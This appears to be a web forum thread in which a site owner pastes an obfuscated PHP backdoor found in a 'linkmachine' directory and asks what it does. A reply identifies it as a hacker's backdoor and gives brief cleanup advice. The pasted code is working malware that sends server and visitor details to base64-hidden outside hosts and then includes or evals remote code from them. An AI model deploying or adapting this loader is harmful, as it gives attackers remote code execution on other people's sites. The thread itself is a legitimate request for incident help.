I found the following php file in a directory on my server: <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?> Can somebody tell me what the devil this thing is and what it does and how do I stop it. A little background: I noticed in my CPanel latest vistor section that I was showing a lot of nonexistant pages with the HTTP Code of 200, instead of the proper 404 code and all of them had the agent string of googlebot and a correct IP address for googlebot, however, those same pages would show in the error log section of CPanel as not found. I checked the server response with a header checker and it is returning a 404 as it should. All of the nonexistant pages were being called from my linkmachine directory. I checked the linkmachine directory and found the file above and others like it spread all thru the linkmachine directory and even other directories on the site that had php files in them. I removed all of those php files that I could find on the site, thinking that would take care of the issue, but it did not, the CPanel still shows the request for nonexistant linkmachine directory pages, but with the correct HTTP Header of 404, but now every few minutes a request is made for the file above followed immediately by a request for a nonexistant page in the linkmachine directory. I cannot find anymore of those php files, I cannot figure out why the requests are still be generated.. Somebody help please... Thanks,
hey, yes you have been hacked, those are PHP backdoors left by the hacker so he can keep access to your server. find the username / owner of those files, and then find all PHP files with that owner on the server, and check each one for backdoors, and hope the hacker did not gain root. goodluck, let me know if you need any help
Hello, Thanks for the reply. How do I find out the username/owner of the files? I have found that it was some type of warez in my linkmachine directory, so the linkmachine directory has been deleted and will be redone with a clean install. I need to check other sites on this server that use linkmachine but I am unsure how to find if they have been infected. Any help will be appreciated